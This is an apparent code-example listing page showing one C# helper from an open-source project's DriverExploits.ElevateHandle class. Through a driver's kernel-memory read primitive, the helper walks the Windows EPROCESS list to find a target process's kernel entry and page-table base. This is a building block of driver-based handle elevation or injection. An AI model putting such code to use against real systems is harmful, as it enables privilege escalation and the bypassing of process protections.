DriverExploits.ElevateHandle.FindKernelProcedure(string)

Here are the examples of the csharp api class DriverExploits.ElevateHandle.FindKernelProcedure(string) taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

1 Example 7

1. Example

Project: loadlibrayy
Source File: ElevateHandle.cs
private static NT.ProcessContext FindProcessInfo(uint targetProcessId)
        {
            NT.ProcessContext processContext = new NT.ProcessContext()
            {
                ProcessId = 0
            };

            // GET POINTER TO THE SYSTEM EPROCESS
            ulong eprocessPointer = (ulong)FindKernelProcedure("PsInitialSystemProcess");

            // READ EPROCESS ADDRESS
            ulong ntosEntry = Driver.ReadSystemAddress<ulong>(eprocessPointer);

            var listHead = ntosEntry + g_OffsetProcessLinks;
            var lastLink = Driver.ReadSystemAddress<ulong>(listHead + sizeof(ulong));

            // ITERATE ALL PROCESSES
            for (var currentLink = listHead; currentLink != lastLink; currentLink = Driver.ReadSystemAddress<ulong>(currentLink))
            {
                var currentEntry = currentLink - g_OffsetProcessLinks;

                var processId = Driver.ReadSystemAddress<ulong>(currentEntry + g_OffsetProcessId);
                
                // PID is a match
                if (processId == targetProcessId)
                {
                    processContext.ProcessId = targetProcessId;
                    processContext.DirectoryBase = Driver.ReadSystemAddress<ulong>(currentEntry + g_OffsetDirectoryTable);
                    processContext.KernelEntry = currentEntry;
                    break;
                }
            }

            return processContext;
        }